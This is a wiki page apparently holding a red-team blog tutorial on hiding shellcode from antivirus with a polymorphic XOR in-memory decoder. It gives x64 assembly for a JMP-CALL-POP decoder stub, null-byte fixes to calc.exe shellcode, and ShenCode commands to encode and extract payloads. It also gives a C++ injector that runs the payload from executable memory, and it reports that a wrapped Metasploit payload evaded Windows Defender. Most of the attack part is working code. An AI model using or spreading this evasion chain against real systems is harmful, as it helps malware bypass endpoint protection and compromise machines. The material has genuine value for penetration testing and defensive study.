You've loaded an old revision of the document! If you save it, you will create a new version with this data. Media Files{{tag>IT-Security Windows Kali pentest obfuscation blog english}} ====== Obfuscation: polymorphic in-memory decoder ====== {{it-security:blog:2024-250_xor_in-memory_decoder.webp?400|}} Red-teaming and penetration tests often require virus scanners to be bypassed in order to effectively detect security vulnerabilities. [[en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen|In the last part]] we looked at disguising shellcode as a UUID in the source code. This also worked well, but the shellcode was recognised in memory and blocked. We now want to solve this with a polymorphic in-memory decoder: A shellcode that decodes shellcode. ===== XOR decoder ===== I have taken the XOR decoder from [[https://www.doyler.net/security-not-included/shellcode-xor-encoder-decoder|doyler.net]] and adapted it to the x64 architecture. This was quite simple, as only the corresponding registers had to be renamed. The decoder starts with this instruction: <code asm> _start: jmp short call_decoder ; Begin of JMP-CALL-POP </code> ''%%JMP-CALL-POP%%'' is a technique that allows us to execute code independently of memory. In this first step, we now jump to the jump label ''%%call_decoder%%'' <code asm> call_decoder: call decoder ; RSP points to the next instruction (the shellcode) ; The encoded shellcode Shellcode: db 0x6a,0x77,0xb6... </code> Here we see that the ''%%CALL%%''-instruction directly calls another part of the programme. As soon as this happens, the register ''%%RSP%%'' saves the pointer to the next command (in our case the shellcode) on the stack. <code asm> decoder: pop rsi ; Move pointer to encoded shellcode into RSI from the stack </code> In the called part of the programme, we save the pointer from the stack to the register ''%%RSI%%'' and know where to address our shellcode in memory. Now we move on to the actual decryption routine: <code asm> decode: xor byte [rsi], 0x3F ; The byte RSI points to, will be XORed by 0x3F jz Shellcode ; jump out of the loop if 0: RSI xor 0x3F = 0 inc rsi ; increment RSI to decode the next byte jmp short decode ; loop until each byte was decoded </code> ''%%xor byte [rsi], 0x3F%%'' now decodes the byte represented by ''%%RSI%%'' is addressed. In this case, this is the first byte of the shellcode. The key for decoding is ''%%0x3F%%'' and can be changed according to the original coding. ''%%jz Shellcode%%'' now checks whether the decoded byte ''%%0x00%%'' corresponds. ==== $Byte \neq 0$ ==== If the result is negative, the code jumps to the next instruction: ''%%inc rsi%%'' ''%%RSI%%'' is incremented and thus points to the next byte in the shellcode, which is decoded during the next run. ''%%jmp short decode%%'' jumps back to the beginning of the function. ==== $Byte = 0$ ==== If the result is positive, the loop is interrupted and the shellcode is executed. It is important to append the key to the shellcode here, because: ''%%0x3F XOR 0x3F = 0x00%%'' This marks the end of the shellcode and interrupts the loop. We therefore do not need an additional counter. ''%%jz shellcode%%'' now jumps directly to our decoded shellcode and executes it. ===== calc.exe Payload ===== We want to execute the ''%%calc.exe%%'' payload from [[en:it-security:blog:shellcode_injection-4|from this blog post]]. However, this still contains 0 bytes, which prevent decoding. Why is this the case? Here is an example: <code> # Encoding XOR Key: 0x3F Byte: 0x00 0x00 XOR 0x3F = 0x3F # Decoding XOR Key: 0x3F Byte: 0x3F 0x3F XOR 0x3F = 0x00 </code> A 0-byte would thus abort the encoding process early, since ''%%jz shellcode%%'' would regard this as a signal to terminate. We therefore need to make a few modifications. ==== GS Register ==== The fix for the GS register from the previous post only removes $2/3$ 0 bytes. This was sufficient for the previous tests. A small change brings us to our goal here: <code asm [enable_line_numbers="true",start_line_numbers_at="26"]> xor rax, rax mov al, 60h mov rax, gs:[rax] ; 65 48 8b 00 </code> change to: <code asm [enable_line_numbers="true",start_line_numbers_at="26"]> xor rax, rax mov rax, gs:[rax+0x60] ; 65 48 8b 40 60 </code> This also reduces the size of our shellcode a little. ==== Kernel32-Base ==== When searching for ''%%Kernel32Base%%'' we only use the register ''%%RAX%%'' without calculation. This also results in a 0 byte. Here, however, we can use the register ''%%RBX%%'' register and thus avoid the 0 bytes. <code asm [enable_line_numbers="true",start_line_numbers_at="30"]> mov rax, [rax] ; 48 8b 00 mov rax, [rax] ; 48 8b 00 </code> change to: <code asm [enable_line_numbers="true",start_line_numbers_at="30"]> mov rbx, [rax] ; 48 8b 18 mov rax, [rbx] ; 48 8b 03 </code> ==== JMP SHORT ==== <code asm [enable_line_numbers="true",start_line_numbers_at="76"]> jmp short InvokeWinExec ; eb 00 </code> Here the code jumps to the next instruction. As the code also does this without ''%%JMP%%'' we can comment out the line. ==== Compile ==== We can compile the code and get a clean op-code. <code batch> nasm -f win64 calc.asm -o calc.o </code> ===== XOR decoder stub ===== ==== Prepare calc.exe payload ==== We now need to edit the op-code a little in order to be able to use it in the decoder. I use my ShellCode tool for this [[https://github.com/psycore8/shencode|ShenCode]]: <code python> python shencode.py extract -f calc.o -o calc.raw -fb 60 -lb 311 ... python shencode.py encode -f calc.raw -o calc.xor -x -xk 63 ... python shencode.py output -f calc.xor -s cs [*] processing shellcode format... 0x6a,0x77,0xb6, ... 0x07,0x77,0xbc,0xfb,0x27,0x77,0xbc,0xfb,0x37,0x62 [+] DONE! </code> Step by step: - We extract the actual shellcode from the file ''%%calc.o%%'' and save it in ''%%calc.raw%%'' (from offset ''%%60%%'' to ''%%311%%'') - We encode the extracted code with the key ''%%63%%'' and save the result in ''%%calc.xor%%'', ''%%63%%'' decimal corresponds to ''%%3F%%'' Hexadecimal - We output the encoded shellcode in C# format (which we can also use for assembler) We save the output, remove the line breaks and append our "magic byte" ''%%0x3F%%'' at the end. ==== XOR decoder and payload ==== Now we can add our payload to the XOR decoder. To do this, we copy the previously prepared code into the last instruction of the XOR decoder: <code asm> ; The encoded shellcode Shellcode: db 0x6a,0x77,0xb6,...0x37,0x62,0x3f </code> We also check whether the XOR key matches: <code asm> decode: xor byte [rsi], 0x3F </code> If everything is correct, we compile our decoder: <code batch> nasm -f win64 xor-decoder.asm -o xor-decoder.o </code> We then search for the shellcode offsets, extract our code and prepare it for our ''%%Inject.cpp%%'' file: <code python> python shencode.py output -f xor-decoder.o -s inspect 0x00000048: 00 00 00 00 00 00 00 00 0x00000056: 20 00 50 60 eb 0b 5e 80 Offset=60 0x00000064: 36 3f 74 0a 48 ff c6 eb ... 0x00000320: bc fb 27 77 bc fb 37 62 0x00000328: 3f 2e 66 69 6c 65 00 00 Offset=329 0x00000336: 00 00 00 00 00 fe ff 00 python shencode.py extract -f xor-decoder.o -o xor-decoder.stub -fb 60 -lb 329 [*] try to open file [+] reading xor-decoder.o successful! [*] cutting shellcode from 60 to 329 [+] written shellcode to xor-decoder.stub [+] DONE! python shencode.py output -f xor-decoder.stub -s c [*] processing shellcode format... "\xeb\x0b\x5e...\x37\x62\x3f""; [+] DONE! </code> ===== Inject.cpp ===== We can now insert the bytes we have just prepared into our injector programme and compile it. <code cpp> #include <stdio.h> #include <windows.h> #include <iostream> #pragma warning unsigned char payload[] = "\xeb\x0b\x5e...\x37\x62\x3f"; int main() { size_t byteArrayLength = sizeof(payload); std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl; void* (*memcpyPtr) (void*, const void*, size_t); void* exec = VirtualAlloc(0, byteArrayLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpyPtr = &memcpy; memcpyPtr(exec, payload, byteArrayLength); ((void(*)())exec)(); return 0; } </code> ===== Debug ===== For testing purposes, I have started a debugger and am now navigating to the memory area of the XOR decoder. During the debug, you can see step-by-step how the instructions in the lower area are decoded. This can be seen in the images below the ''%%call%%'' statement (which is ''%%Shellcode: db ...%%'' corresponds to). {{it-security:blog:2024-250_xor_in-memory_decoder.png?600|}} {{it-security:blog:2024-250_xor_in-memory_decoder_1.png?600|}} {{it-security:blog:2024-250_xor_in-memory_decoder_2.png?600|}} {{it-security:blog:2024-250-animation.gif|}} The animation above shows the decoding loop, while the shellcode in the lower area is decoded step by step. ===== Test with a Metasploit payload ===== The whole thing also works with a Metasploit payload: {{it-security:blog:2024-250_xor_in-memory_decoder_3.png?700|}} ===== Conclusion ===== To simplify the process, I have integrated the XOR stub as a template in [[https://github.com/psycore8/shencode|ShenCode]] as a template. With two commands, we generate an XOR in-memory decoder: <code python> python shencode.py encode -f input.raw -o xor.out --xor --xorkey 63 python shencode.py create --xor-stub --xor-filename xor.out --xor-outputfile stub.raw --xor-key 63 </code> The XOR decoder provides effective memory protection. In combination with other obfuscation techniques, this can be a good helper for penetration tests. During my test, even the Metasploit payload was not detected by Windows Defender. ~~DISCUSSION~~Please solve the following equation to prove you're human. 64 +10 = Please keep this field empty: SavePreviewCancel Edit summary Note: By editing this page you agree to license your content under the following license: CC Attribution-Noncommercial-Share Alike 4.0 International